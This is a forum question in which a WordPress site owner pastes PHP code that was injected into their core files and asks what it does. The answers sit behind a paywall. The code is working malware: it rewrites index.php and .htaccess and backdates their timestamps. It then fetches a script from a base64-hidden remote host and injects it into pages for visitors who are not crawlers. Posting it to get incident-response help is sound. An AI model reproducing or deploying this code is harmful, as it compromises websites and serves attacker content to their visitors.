aideb
asked on
Wordpress files have been modified - What is the impact
I have the Wordfence plugin installed on all the Wordpress sites that I have on shared hosting. I get messages occasionally that people are attempting to compromise the passwords. For that reason, the usernames are not standard e.g. no 'admin', and the passwords are complex. It also emails when an admin logs in.
This morning I got an email saying that core files had been modified.
Here is the change that was added
Can anyone offer some assistance to work out what the impact of this is on my sites
I updated the plugins on Friday across all sites so I am unsure how I have been compromised.
Whilst I have restored the files, I need to know if there is anything else I need to do.
Thanks
This morning I got an email saying that core files had been modified.
Here is the change that was added
nction my_time($dir) {
foreach (glob($dir . '/wp-*.php') as $f) {
$times[] = filemtime($f);
}
$max = 1;
for ($i = 0; $i < count($times) - 1; $i++) {
$k = 1;
for ($j = $i + 1; $j < count($times); $j++) {
if ($times[$i] == $times[$j]) {
$k++;
if ($k > $max) {
$max = $k;
$time = $times[$i];
}
}
}
}
return $time;
}
function my_correct($dir) {
$time = 0;
$path = $dir . '/index.php';
$content = base64_decode('PD9waHAKLyoqCiAqIEZyb250IHRvIHRoZSBXb3JkUHJlc3MgYXBwbGljYXRpb24uIFRoaXMgZmlsZSBkb2Vzbid0IGRvIGFueXRoaW5nLCBidXQgbG9hZHMKICogd3AtYmxvZy1oZWFkZXIucGhwIHdoaWNoIGRvZXMgYW5kIHRlbGxzIFdvcmRQcmVzcyB0byBsb2FkIHRoZSB0aGVtZS4KICoKICogQHBhY2thZ2UgV29yZFByZXNzCiAqLwoKLyoqCiAqIFRlbGxzIFdvcmRQcmVzcyB0byBsb2FkIHRoZSBXb3JkUHJlc3MgdGhlbWUgYW5kIG91dHB1dCBpdC4KICoKICogQHZhciBib29sCiAqLwpkZWZpbmUoJ1dQX1VTRV9USEVNRVMnLCB0cnVlKTsKCi8qKiBMb2FkcyB0aGUgV29yZFByZXNzIEVudmlyb25tZW50IGFuZCBUZW1wbGF0ZSAqLwpyZXF1aXJlKCBkaXJuYW1lKCBfX0ZJTEVfXyApIC4gJy93cC1ibG9nLWhlYWRlci5waHAnICk7Cg==');
if (file_get_contents($path) != $content) {
chmod($path, 0644);
file_put_contents($path, $content);
chmod($path, 0444);
$time = my_time($dir);
touch($path, $time);
}
$path = $dir . '/.htaccess';
$content = base64_decode('IyBCRUdJTiBXb3JkUHJlc3MKPElmTW9kdWxlIG1vZF9yZXdyaXRlLmM+ClJld3JpdGVFbmdpbmUgT24KUmV3cml0ZUJhc2UgLwpSZXdyaXRlUnVsZSBeaW5kZXhcLnBocCQgLSBbTF0KUmV3cml0ZUNvbmQgJXtSRVFVRVNUX0ZJTEVOQU1FfSAhLWYKUmV3cml0ZUNvbmQgJXtSRVFVRVNUX0ZJTEVOQU1FfSAhLWQKUmV3cml0ZVJ1bGUgLiAvaW5kZXgucGhwIFtMXQo8L0lmTW9kdWxlPgoKIyBFTkQgV29yZFByZXNzCg==');
if (file_exists($path) AND file_get_contents($path) != $content) {
chmod($path, 0644);
file_put_contents($path, $content);
chmod($path, 0444);
if (!$time) {
$time = my_time($dir);
}
touch($path, $time);
}
}
my_correct(dirname(__FILE__) . '/..');
function request_url_data($url) {
$site_url = (preg_match('/^https?:\/\//i', $_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
if (function_exists('curl_init')) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'X-Forwarded-For: ' . $_SERVER["REMOTE_ADDR"],
'User-Agent: ' . $_SERVER["HTTP_USER_AGENT"],
'Referer: ' . $site_url,
));
$response = trim(curl_exec($ch));
} elseif (function_exists('fsockopen')) {
$m = parse_url($url);
if ($fp = fsockopen($m['host'], 80, $errno, $errstr, 6)) {
fwrite($fp, 'GET http://' . $m['host'] . $m["path"] . '?' . $m['query'] . ' HTTP/1.0' . "\r\n" .
'Host: ' . $m['host'] . "\r\n" .
'User-Agent: ' . $_SERVER["HTTP_USER_AGENT"] . "\r\n" .
'X-Forwarded-For: ' . @$_SERVER["REMOTE_ADDR"] . "\r\n" .
'Referer: ' . $site_url . "\r\n" .
'Connection: Close' . "\r\n\r\n");
$response = '';
while (!feof($fp)) {
$response .= fgets($fp, 1024);
}
list($headers, $response) = explode("\r\n\r\n", $response);
fclose($fp);
}
} else {
$response = 'curl_init and fsockopen disabled';
}
return $response;
}
error_reporting(0);
$_passssword = '98b18acce3ce2362c1ae9afb8b28490f';
unset($_passssword);
if (function_exists("add_action")) {
add_action('wp_head', 'add_2head');
add_action('wp_footer', 'add_2footer');
}
function add_2head() {
ob_start();
}
function add_2footer() {
$check = false;
$check_data = "";
if (!empty($_GET['check']) AND $_GET['check'] == '98b18acce3ce2362c1ae9afb8b28490f') {
$check = true;
$check_data = ('<!--checker_start ');
$check_data .= (substr(request_url_data('http://maxcdn.bootstrapcdn.com/bootstrap/3.3.4/css/bootstrap.min.css'), 0, 100));
$check_data .= (' checker_end-->');
}
if (!$check) {
if (!@$_SERVER['HTTP_USER_AGENT'] OR (substr($_SERVER['REMOTE_ADDR'], 0, 6) == '74.125') OR preg_match('/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i', $_SERVER['HTTP_USER_AGENT']))
return;
$cookie_name = 'PHP_SESSION_PHP';
if (isset($_COOKIE[$cookie_name]))
return;
foreach (array('/\.css$/', '/\.swf$/', '/\.ashx$/', '/\.docx$/', '/\.doc$/', '/\.xls$/', '/\.xlsx$/', '/\.xml$/', '/\.jpg$/', '/\.pdf$/', '/\.png$/', '/\.gif$/', '/\.ico$/', '/\.js$/', '/\.txt$/', '/ajax/', '/cron\.php$/', '/wp\-login\.php$/', '/\/wp\-includes\//', '/\/wp\-admin/', '/\/admin\//', '/\/wp\-content\//', '/\/administrator\//', '/phpmyadmin/i', '/xmlrpc\.php/', '/\/feed\//') as $regex) {
if (preg_match($regex, $_SERVER['REQUEST_URI']))
return;
}
}
$buffer = ob_get_clean();
ob_start();
$regexp = '/<body[^>]*>/is';
if (preg_match($regexp, $buffer, $m)) {
$body = $m[0];
$url = base64_decode('aHR0cDovL25pa2FyYWd1YS5zbHlpcC5jb20vYmxvZy8/YmY0eiZ1dG1fc291cmNlPTIwOTI0OjE0NTEyNToyNDA=');
// if (($code = request_url_data($url)) AND base64_decode($code) AND preg_match('#[a-zA-Z0-9+/]+={0,3}#is', $code, $m)) {
if (($code = request_url_data($url)) AND $decoded = base64_decode($code, true)) {
$body .= '<script>var date = new Date(new Date().getTime() + 60*60*24*7*1000); document.cookie="' . $cookie_name . '=' . mt_rand(1, 1024) . '; path=/; expires="+date.toUTCString();</script>';
// $body .= base64_decode($m[0]);
$body .= $decoded;
// $body .= base64_decode($m[0]);
}
$body .= $check_data;
$buffer = preg_replace($regexp, $body, $buffer);
}
echo $buffer;
ob_flush();
}//iend
Can anyone offer some assistance to work out what the impact of this is on my sites
I updated the plugins on Friday across all sites so I am unsure how I have been compromised.
Whilst I have restored the files, I need to know if there is anything else I need to do.
Thanks
SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
ASKER CERTIFIED SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
ASKER